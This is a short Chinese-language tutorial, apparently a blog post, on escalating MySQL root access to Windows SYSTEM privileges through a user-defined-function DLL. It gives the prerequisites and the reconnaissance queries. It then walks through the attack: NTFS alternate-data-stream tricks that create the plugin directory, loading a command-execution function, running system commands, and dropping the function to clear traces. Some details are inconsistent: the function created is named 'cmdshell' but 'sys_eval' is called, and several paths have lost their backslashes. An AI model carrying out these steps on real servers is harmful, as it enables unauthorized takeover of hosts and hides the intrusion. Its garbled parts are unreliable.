0x00 原理
UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展。
通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令,将MYSQL账号root转化为系统system权限。
0x01 利用条件
-
mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的libplugin文件夹下
-
mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:windowssystem32目录,在windows server 2000下放置在c:winntsystem32目录。
-
掌握mysql数据库的账户,从拥有对mysql的
insert和delete权限,以创建和抛弃函数。拥有可以将udf.dll写入相应目录的权限。 -
可以将udf.dll写入到相应目录的权限。
0x02 提权关键
导出UDF文件到指定路径
0x03 提权步骤
1、获取数据库版本、数据位置以及插件位置等信息
select version();//获取数据库版本
select user();//获取数据库用户
select @@basedir ;//获取安装目录
show variables like '%plugins%'; //寻找mysql安装路径
2、导出UDF文件
关于UDF文件:
sqlmap中有现成的udf文件,分为32位和64位,一定要选择对版本
关于路径:
MySQL<5.0,导出路径随意;
5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)
MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的libplugin文件夹下才能创建自定义函数。
用NTFS ADS流模式突破进而创建文件夹
select @@basedir; //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录
3、创建cmdshell 函数
create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’;
4、执行自定义函数
select sys_eval(‘whoami’);
5、清除痕迹
drop function cmdshell
0x04 参考
https://www.cnblogs.com/R4v3n/articles/8722657.html
《网络攻防实战研究——漏洞利用与提权》